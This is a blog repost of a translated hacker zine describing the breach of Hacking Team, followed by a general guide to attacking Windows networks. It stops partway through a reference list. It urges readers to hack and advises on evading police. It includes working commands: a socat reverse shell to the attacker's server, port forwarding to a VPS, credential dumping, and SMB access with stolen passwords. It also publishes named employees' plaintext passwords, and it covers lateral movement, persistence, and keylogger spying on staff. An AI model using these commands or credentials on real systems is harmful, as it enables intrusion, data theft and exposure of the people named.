This is by no means my own content, I found it on pastebin and kept it. I also did some changes to the formatting, but tried to keep as much of the beautiful original text file zine feel to it. Hope you enjoy and that you learn a great deal about security and Linux. If you are a beginner at Linux then read it and if you have any questions feel free to leave a question in the comments and I will try answer.

| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) A DIY Guide ,-._,-._ _,-\ o O_/; / , ` `| | \-.,___, / ` \ `-.__/ / ,.\ / `-.__.-\` ./ \' / /| ___\ ,/ `\ ( ( |.-"` '/\ \ ` \ \/ ,, | \ _ \| o/o / \. \ , / / ( __`;-;'__`) \\ `//'` `||` `\ _// || __ _ _ _____ __ .-"-._,(__) .(__).-""-. | | | | |_ _| | / \ / \ | | |_| | | | | \ / \ / | | _ | | | | `'-------` `--------'` __| |_| |_| |_| |__ #antisec

UPDATE: the original author, Phineas Fisher, has released his own translation,

making this quick draft more or less obsolete. You can find his version here:

http://pastebin.com/raw/0SNSvyjJ

0xdeba5e12

1 - Introduction:

Note the change in language since the last issue [1]. The

English-speaking worlds already has books, talks, guides, and all

sorts of information about hacking. There are a lot of hackers in that

world who are better than I am, but disgracefully fritter away their

knowledge working as "defence" contractors, for intelligence agencies,

protecting banks and corporations and defending the established order.

Hacker culture in the US originated as a counterculture, but all

that's left of that origin is the aesthetic -- everything else has

been assimilated. At least they get to wear a T-shirt, dye their hair

blue, use hacker handles, and feel like rebels while they work for the

system.

There was once a time when you had to break into an office building to

exfiltrate documents [2]. You used to need a gun to rob a bank. These

days you can do it all from bed with a laptop in your hands [3][4].

Like the CNT once said about the Gamma Group hack: "we should move

forward with these new forms of struggle" [5]. Hacking is a powerful

tool. Learn it and join the fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI

[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-15092108

3914167.html

[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf

[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-

gamma-group

2 - Hacking Team:

Hacking Team was a company that helped governments to hack and spy

on journalists, activists, the political opposition, and other threads

to their power [1][2][3][4][5][6][7][8][9][10][11] -- as well as,

every now and then, criminals and terrorists [12]. Vincenzetti, the

CEO, liked to end his emails with the fascist slogan "boia chi molla".

He was, more precisely, a "boia chi vende RCS". All the while, he

claimed to have the technology to solve the "Tor problem" and the

"darknet problem" [13]. But since I've been able to maintain my

freedom, I have my doubts about how effective that technology is.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/

[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html

[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/

[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/

[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/

[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/

[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal

[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/

[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/

[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/

[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html

[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

3 - Be careful out there:

Sadly, our world is upside-down. You get richer by doing bad things,

and get locked up for doing good things. Fortunately, thanks to the

hard work of people like those in the "Tor Project" [1], you can avoid

getting yourself locked up by following a few simple guidelines:

Encrypt your hard drive [2] I assume that by the time the police come to impound your computer,

you've already made many mistakes, but an ounce of prevention is

worth a pound of cure. Use a virtual machine and route all your traffic through Tor This achieves two things. First, all of your connections are

anonymized through the Tor network. Second, keeping your personal

life and your anonymous life on different computers helps you avoid

mixing them up by accident. You can protect yourself with Whonix [3], Tails [4], Qubes TorVM

[5], or something personalized [6]. You can find a detailed

comparison here [7]. (Optional) Don't connect to the Tor network directly Tor is not a panacea. It's possible to correlate the times at which

your connected to Tor with the times during which your hacker

handle is active. There have also been attacks using the Tor exit

node [8]. You can connect to the network using other people's wifi.

Wifislax [9] is a linux distro with many tools for procuring wifi.

Another option is to connect to a VPN or a bridge node [10] before

connecting to Tor, but this is less secure because it is possible

to correlate the hacker's activity with the internet activity

coming from your house (this was used as evidence against Jeremy

Hammond, for example [11]). The reality is that while Tor is not perfect, it works well enough.

When I was young and reckless, I did a lot of things without any

protection (I'm talking about hacking, here) apart from Tor, and

which the police were still incapable of investigating, and I never

had any problems.

[1] https://www.torproject.org/

[2] https://info.securityinabox.org/es/chapter-4

[3] https://www.whonix.org/

[4] https://tails.boum.org/

[5] https://www.qubes-os.org/doc/privacy/torvm/

[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

[7] https://www.whonix.org/wiki/Comparison_with_Others

[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/

[9] http://www.wifislax.com/

[10] https://www.torproject.org/docs/bridges.html.en

[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

3.1 - Infrastructure:

I don't hack directly from the Tor exit nodes. They're on blacklists,

go very slowly, and cannot receive reverse connections. Tor serves to

protect my anonymity while I connect to the infrastructure I use for

hacking, which consists of:

Domain names to give directions to command and control (C&C), and for setting up

DNS tunnels for secure exfiltration. Stable server to serve as C&C servers for receiving reverse shells, as a place to

launch attacks from, and a place to stash the loot. Hacked servers these serve as pivots behind which I hide the IP addresses of

stables servers, and for when I want a quick connection without

a pivot -- for portscanning, for example, or scanning the entire

internet, or downloading a database through sql injection, etc.

Obviously you have pay anonymously, with bitcoin, for exaple (if you

use it carefully).

3.2 - Accountability:

In the news we often see attacks attributed to groups of governmental

hackers ('APTs'), because they always use the same tools, leave the

same footprints, and even use the same infrastructure (domains,

emails, etc.). They're negligent because they free to hack without any

legal consequences.

I didn't want to make it too easy for the police to link what I did to

Hacking Team, with its hacks and handles, with my day-to-day work

as a blackhat hacker. So I used new servers and domains, registered

with new email accounts, and payed with new bitcoin. And I only used

tools which were either publically available, or which I had written

specifically for this attack, and I changed my style of doing things

so as to not leave my usual forensic footprint.

4 - Gathering information:

Though it might be tedious, this step is very important, since the

larger the attack surface, the easier it will be to find a weakness

in it, somewhere.

4.1 - Technical Information:

Some of the tools and techniques include:

Google You can find a lot of unexpected things with a couple well-chosen

search queries. The identity of DPR, for example [1]. The bible on

how to use google for hacking is the book, "Google Hacking for

Penetration Testers" [2]. Enumeration of subdomains A business's main domain is usually supplied by a third party, and

you're going to find a range of IP addresses belonging to

subdomains like mx.company.com, ns1.company.com, etc. And sometimes

there are things in 'hidden' subdomains that should not be exposed.

Tools useful for discovering domains are subdomains include fierce

[3], theHarvester [4], and recon-ng [5]. Whois queries and inverse queries With an inverse query using a domain's whois information or a

business's IP range, you can find other domains and IP ranges

belonging to them. As far as I know, there's no free way of making

inverse whois queries, except for a google 'hack': "via della moscova 13" site:www.findip-address.com

"via della moscova 13" site:domaintools.com Portscanning and fingerprinting Apart from the other techniques, you can talk to the business's

employees. I include it in this section because it isn't an attack,

just a means of obtaining information. The business's IDS might

generate an alert upon detecting a portscan, but you don't have to

worry about that. The entire internet is scanning itself

constantly. For scanning, nmap [6] is precise, and can fingerprint most of the

services it discovers. For businesses with large IP ranges, zmap

[7] or masscan [8] are fast. WhatWeb [9] and BlindElephant [10] can

fingerprint websites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html

[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf

[3] http://ha.ckers.org/fierce/

[4] https://github.com/laramies/theHarvester

[5] https://bitbucket.org/LaNMaSteR53/recon-ng

[6] https://nmap.org/

[7] https://zmap.io/

[8] https://github.com/robertdavidgraham/masscan

[9] http://www.morningstarsecurity.com/research/whatweb

[10] http://blindelephant.sourceforge.net/

4.2 - Social information:

For social engineering, it's very useful to gather information about

the employees, their roles, contract information, operating system,

nagivator, plugins, software, etc. Some resources include:

Google Here's the most useful tool, again. theHarvester y recon-ng I've mentioned these already in the last section, but they have

much more functionality. You can find a lot of information quickly

and automatically. It's worth the trouble to read all the

documentation. LinkedIn You can find a lot of information about the employees here. The

businesses' recruiters will be the ones most inclined to talk. Data.com Previously known as jigsaw. They have contact information for many

employees. File metadata You can find a lot of information about employees and their system

in the metadata of files that the business has published. Some

handy tools for finding files on a business's website and

extracting metadata are metagoofil [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil

[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

5 - Entering the Network:

There are various ways to make an entrance. Since the method used for

Hacking Team is less common and more trouble than is ordinarily

necessary, I'm going to talk a bit about more common methods, which I

recommend attempting first.

5.1 - Social engineering:

Social engineering, and specifically spear phishing, is responsible

for the majority of hacks these days. For an introduction in Spanish,

see [1]. For more information in English, see [2] (the third part,

"Targeted Attacks"). For entertaining anecdotes about social

engineering in the past, see [3]. I didn't want to try spear phishing

against Hacking Team, since their business is in helping

governments spear phish their opposition. There was therefore a much

greater risk of Hacking Team recognizing and investigating said

attempts.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html

[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/

[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

5.2 - Buying access:

Thanks to the hardworking Russians and their exploit kits, traffic

trafickers, and bot farms, many businesses already have compromised

machines in their network. Almost all of the Fortune 500, with their

enormous networks, have a few bots on the inside. That said, Hacking

Team is a very small business, most of whose employees are experts in

information security, and so there was very little probability that

they had already been compromised.

5.3 - Technical exploitation:

After the Gamma Group hack, I discovered a process for searching for

vulnerabilities [1]. Hacking Team has the public IP range:

inetnum: 93.62.139.32 - 93.62.139.47 descr: HT public subnet

Hacking Team had a small exposure to the internet. For example, unlike

the Gamma Group, their public-facing site required the client to have

a certificate in order to connect. It contained a main website (a

Joomla blog, for which Joomscan [2] revealed no serious

vulnerabilities), a mail server, a couple of routers, two VPN systems,

and a spam-filtering system. And so I had three options: to try to

find a 0day in Joomla, a 0day in postfix, or a 0day in one of the

embedded systems. A 0day in an embedded system seemed to me to be the

most tenable option, and after about two weeks of reverse engineering,

I discovered a remote root exploit. Since the vulnerabilities it

relies on haven't yet been patched, I'm not going to give any more

details on it. For more information on how to search for this type of

vulnerability, see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] http://sourceforge.net/projects/joomscan/

[3] http://www.devttys0.com/

[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

6 - Be prepared:

I did a lot of work and testing before using the exploit against

Hacking Team. I wrote a firmware with a backdoor, and compiled various

post-exploitation tools for the embedded system. The backdoor served

to protect the exploit. Using the exploit just once and then returning

thorugh the back door made the work of discovering and patching

vulnerabilities more difficult.

The post-exploitation tools I had prepared were:

busybox for all the common Unix utilities that the system didn't have. nmap for scanning and fingerprinting Hacking Team's internal network. Responder.py the most useful tool for attacking Windows when you have access to

the internal network but don't have a user account. Python for executing Responder.py. tcpdump for sniffing traffic. dsniff for snooping passwords from vulnerable protocols like ftp, and for

arpspoofing. I'd rather have used ettercap, writen by Hacking

Team's own ALoR and NaGA, but it was difficult to compile for the

system. socat for a handy pty shell:

On my_server:

$ socat file: `tty`, raw, echo=0, tcp-listen:mi_port

On the hacked_system:

$ socat exec:'bash -li',pty,stderr,setsid,sigint,\ sane tcp:my_server:my_port

And for many other things. It's a network swiss army knife. See the

examples section of its documentation.

screen like socat's pty, not strictly necessary, but I wanted to feel at

home in Hacking Team's network. a SOCKS proxy server to use together with proxychains for accessing the internal network

with this or that other programme. tgcd for forwarding ports, like those of the SOCKS server, through the

firewall.

[1] https://www.busybox.net/

[2] https://nmap.org/

[3] https://github.com/SpiderLabs/Responder

[4] https://github.com/bendmorris/static-python

[5] http://www.tcpdump.org/

[6] http://www.monkey.org/~dugsong/dsniff/

[7] http://www.dest-unreach.org/socat/

[8] https://www.gnu.org/software/screen/

[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

[10] http://tgcd.sourceforge.net/

The worst thing that could happen would be that my backdoor or

post-exploit tools would make the system unstable, and force an

employee to investigate. So I spent a week testing my exploit,

backdoor, and post-exploit tools in the networks of other vulnerable

businesses before entering Hacking Team network.

7 - Watch and listen:

Now that I was inside the internal network, I wanted to take a look

around and think about my next step. Switching Responder.py to

analysis mode (-A, to listen without sending poisoned responses), and

performed a slow scan with nmap.

8 - NoSQL databases:

NoSQL, or rather NoAuthentication, has been a great gift to the hacker

community [1]. Just when I was worrying that all MySQL's sins of

omission had finally been patched [2][3][4][5], these new databases

appear, lacking authentication by design. Nmap found a few in Hacking

Team's internal network:

27017/tcp open mongodb MongoDB 2.6.5 | mongodb-databases: | ok = 1 | totalSizeMb = 47547 | totalSize = 49856643072 ... |_ version = 2.6.5 27017/tcp open mongodb MongoDB 2.6.5 | mongodb-databases: | ok = 1 | totalSizeMb = 31987 | totalSize = 33540800512 | databases ... |_ version = 2.6.5

These were databases for RCS test instances. The audio that RCS

captures is held in a MongoDB with GridFS. This is where the audio

folder in the torrent [6] came from. They had inadvertantly spied on

themselves.

[1] https://www.shodan.io/search?query=product%3Amongodb

[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html

[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c

[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html

[6] https://ht.transparencytoolkit.org/audio/

9 - Crossed wires:

As fun as it was to listen to captures and watch webcam images of

Hacking Team developing its malware, it wasn't very useful. Their

insecure security backups were the vulnerability that threw the doors

open. According to the documentation [1], their iSCSI systems should

have been on a separate network, but nmap count a few of them in their

192.168.1.200/24 subnet:

... 3260/tcp open iscsi? | iscsi-info: | Target: iqn.2000-01.com.synology:ht-synology.name | Address: 192.168.200.66:3260,0 |_ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

... 3260/tcp open iscsi? | iscsi-info: | Target: iqn.2000-01.com.synology:synology-backup.name | Address: 10.0.1.72:3260,0 | Address: 192.168.200.72:3260,0 |_ Authentication: No authentication required

iSCSI requires a kernel module, and it would have been difficult to

compile it for the embedded system. I forwarded the port so that I

could mount it from a VPS:

VPS:

$ tgcd -L -p 3260 -q 42838

Sistema embebida:

$ tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS:

$ iscsiadm -m discovery -t sendtargets -p 127.0.0.1

iSCSI now finds the name iqn.2000-01.com.synology, but has some

problems mounting it since it now believes that its address is both

192.168.200.72 and 127.0.0.1.

The to solve this is:

# iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

and then:

# iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...and the archive system appears! We mount it:

# vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find secure backups of various virtual machines. The Exchange

server seems like the most interesting. It's too big to download, but

we can mount it remotely and search for interesting archives:

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk $ fdisk -l /dev/loop0 /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT entonces el offset es 2048 * 512 = 1048576 $ losetup -o 1048576 /dev/loop1 /dev/loop0 $ mount -o ro /dev/loop1 /mnt/exchange/

and now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14

172311 we find the hard drive of the virtual machine, and mount it:

# vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ # mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and, finally, we have gotten to the centre of the matryoshka doll

and we can see all of the archives of the old Exchange server on

/mnt/part1.

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/Infras

trutturaIT/Rete/infrastruttura%20ht.pdf

10 - From secure backups to domain admin:

What interested me most in the secure backup was trying to find a

password or hash that I could use to access the actual server. I used

pwdump, cachedump, and lsadump [1] with the registry backups. lsdadump

found a password for the besadmin service account:

_SC_BlackBerry MDS Connection Service 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........

I used proxychains [2] with the socks server in the embedded system

and smbclient [3] to check the password:

$ proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The besadmin password was still valid, and was a local

admin. I used my proxy and metasploit's psexec_psh [4] to gain a

meterpreter session. I migrated to a 64-bit process, "load kiwi [5],

and "creds_wdigest", and by now had a number of passwords, including

the domain admin's:

HACKINGTEAM BESAdmin bes32678!!! HACKINGTEAM Administrator uu8dd8ndd12! HACKINGTEAM c.pozzi P4ssword <---- look! the sysadmin! HACKINGTEAM m.romeo ioLK/(90 HACKINGTEAM l.guerra [email protected]=.= HACKINGTEAM d.martinez W4tudul3sp HACKINGTEAM g.russo GCBr0s0705! HACKINGTEAM a.scarafile Cd4432996111 HACKINGTEAM r.viscardi Ht2015! HACKINGTEAM a.mino A!e$$andra HACKINGTEAM m.bettini Ettore&Bella0314 HACKINGTEAM m.luppi Blackou7 HACKINGTEAM s.gallucci 1S9i8m4o! HACKINGTEAM d.milan set!dob66 HACKINGTEAM w.furlan Blu3.B3rry! HACKINGTEAM d.romualdi [email protected]# HACKINGTEAM l.invernizzi L0r3nz0123! HACKINGTEAM e.ciceri 2O2571&2E HACKINGTEAM e.rabe [email protected]!

[1] https://github.com/Neohapsis/creddump7

[2] http://proxychains.sourceforge.net/

[3] https://www.samba.org/

[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf

[5] https://github.com/gentilkiwi/mimikatz

11 - Downloading the mail:

Now that I had the password to the domain's admin, I had access to the

email, the heart of the business. Since every password I used raised

the risk of being detected, I download the emails before going on to

explore them. Powershell makes this easy [1]. Curiously, I found a bug

in the way that dates were handled. After obtaining the emails, I

waited a couple of weeks before getting the source code and all the

rest, returning once in a while to download new emails. The server was

Italian, with dates in the format day/month/year. I used:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new mails (in this case

all the mails from June 5th onward). The problem was that it said that

the date is invalid if the day is greater than 12 (imagine that this

is because the month is usually put first in the US, and the month

can't be greater than 12). It seems that the engineers at Microsoft

had only tested their software on their own regional configuration.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

12 - Downloading archives:

Now that I was the domain's admin, I started downloading the shared

resources using my proxy and smbclient's -Tc option. For example:

$ proxychains smbclient '//192.168.1.230/FAE DiskStation' \ -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

This is where the Amministrazione, FAE DiskStation, and FileServer

folders in the torrent came from.

13 - Introduction to hacking a Windows domain:

I'd like to take a break from the story of these fuckers [weones

culiaos], to share a bit of knowledge about attacking Windows

networks.

13.1 - Lateral movement:

I'm going to give a quick review of the techniques used for spreading

out inside a Windows network. The techniques for remote execution

require a local administrator's password or hash to work. Often, the

most common way of obtaining these credentials is to use mimikatz [1],

and above all sekurlsa::logonpasswords and sekurlsa::msv, from the

machines you already have administrative access to. The techniques for

moving around "in situ" also require administrative privileges (except

for runas). The most important tools for

privilege escalation are PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821

[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

Remote navigation:

psexec The tried and tested way of navigating Windows networks. You can

use psexec [1], winexe [2], metasploit's psexec_psh [3], powershell

empire's invoke_psexec [4], or the Windows command "sc" [5]. For

the metasploit module, powershell empire, and pth-winexe [6], it's

enough to know the hash without knowing the password. This is the

most universal way (it works on any computer with port 445 open),

but it is also the least cautious. Events of type 7045 "Service

Control Manager" will appear in the registry. In my experience,

this has never tipped anyone off during a hack, but it's something

they might notice afterwards, and it might help the investigators

figure out what the hacker was doing. WMI The most cautious method. The WMI service is enabled on all Windows

computers, except for servers, where the firewall blocks it by

default. You can use wmiexec.py [7], pth-wmis [6] (you can find a

demo of wmiexec and pth-wmis here [8]), powershell empires's

invoke_wmi, or the Windows command, wmic [5]. Aside from wmic, the

rest of these require only the hash. PSRemoting [10] This is disabled by default, and I don't advise enabling new

protocols unless you have you. But if the sysadmin has already

enabled it, it's very convenient, especially if you use powershell

for everything (and yes, you should use powershell for almost

everything; this may change [11] with powershell 5 and Windows 10,

but right now powershell makes it easy to do everything in RAM,

dodge the antivirus, and leave few footprints). Programmed tasks You can execute programmes remotely with at and schtasks [5]. They

work in the same situations as psexec, and likewise leave some

known footprints [12]. GPO If all of those protocols are disabled or blocked by the firewall,

once you are the administrator of the domain, you can use GPO to

give it a logon script, install an msi, execute a programmed task

[13], or as we will see with computer of Mauro Romeo (Hacking

Team's sysadmin), enable WMI and open the firewall through GPO.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

[2] https://sourceforge.net/projects/winexe/

[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh

[4] http://www.powershellempire.com/?page_id=523

[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-

cc/

[6] https://github.com/byt3bl33d3r/pth-toolkit

[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

[8] https://www.trustedsec.com/june-2015/no_psexec_needed/

[9] http://www.powershellempire.com/?page_id=124

[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/

[11] https://adsecurity.org/?p=2277

[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

Navigation 'in situ':

Impersonating tokens Once you have administrative access to a computer, you can use

other users' tokens to access the domain's resources. Two tools for

doing this are incognito [1] and the token::* commands in mimikatz

[2]. MS14-068 You can take advantage of a validation vulnerability in Kerberos to

generate a domain administrator ticket [3][4][5]. Pass the Hash If you have your has but the user does not have an active session,

you can use sekurlsa:pth [2] to obtain a user ticket. Process injection Any RAT can be injected into another process -- the migrate command

in meterpreter and pupy [6], for example, or psinject [7] in

powershell empire. You can inject the process that has the token

that you want. runas This sometimes turns out to be very useful because it doesn't

require admin privileges. The command is part of Windows, but if

you dont' have the graphical interface, you can use powershell

[8].

[1] https://www.indetectables.net/viewtopic.php?p=211165

[2] https://adsecurity.org/?page_id=1821

[3] https://github.com/bidord/pykek

[4] https://adsecurity.org/?p=676

[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html

[6] https://github.com/n1nj4sec/pupy

[7] http://www.powershellempire.com/?page_id=273

[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

13.2 - Persistence:

Once you have gained access, you want to maintain it. Persistence is

really only a challenge for sons of bitches [hijos de puta] like the

ones in Hacking Team, who want to hack activists or other individuals.

When you're hacking businesses, you don't need persistence because the

business never sleeps. The only 'persistence' I use is in duqu 2's

sense, executing in the RAM of a couple of servers with high rates of

uptime. In the hypothetical case that everything is reset at once, I

have passwords and a golden ticket [1] set aside. You can read more

information about persistence mechanisms for Windows here [2][3][4].

But for hacking businesses, you don't need it, and it raises the risk

of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-t

icket-howto/

[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-e

mpire/

[3] http://www.hexacorn.com/blog/category/autostart-persistence/

[4] https://blog.netspi.com/tag/persistence/

13.3 - Internal reconnaissance:

The best tool these days for understanding Windows networks is

Powerview [1]. It's worth the trouble to read everything by the author

[2], and above all [3], [4], [5], and [6]. Powershell is, again, very

powerful [7]. But since there are still many 2003 and 2000 servers

without powershell, you should also look the old school way [8], with

tools like netview.exe [9] or the windows "new view" command. Other

techniques that I like are:

Download a list archive numbers With the domain administrator account, you can download all the

archive numbers in the network with powerview: Inqvoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |

select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1]

| select fullname | out-file -append files.txt} You can then read it at your leisure later on, and choose the ones

that you want to download. Read emails As we have already seen, you can download emails with powershell,

and obtain a lot of useful information. Read sharepoint This is another place where many businesses have important

information. You can download it with powershell [10]. Active Directory [11] It holds a lot of useful information about users and computers.

Without being the domain admin, you can already find a great deal

of information with powerview and other tools [12]. After becoming

the domain admin, you should export all the information from AD

using csvde or some other tools. Spy on the employees One of my favourite pastimes is to hunt the sysadmins. By spying on

Christian Pozzi (Hacking Team's sysadmin), I gained access to the

Nagios server, which gave me access to the 'rete sviluppo' (the

development network with the RCS source code). With a simple

combination of PowerSploit's Get-Keystrokes and Get-TimedScreenshot

[13], nishang's Do-Exfiltration, and GPO, I could spy on any

employee I wanted, or even the entire domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

[2] http://www.harmj0y.net/blog/tag/powerview/

[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/

[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/

[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/

[6] http://www.slideshare.net/harmj0y/i-have-the-powerview

[7] https://adsecurity.org/?p=2535

[8]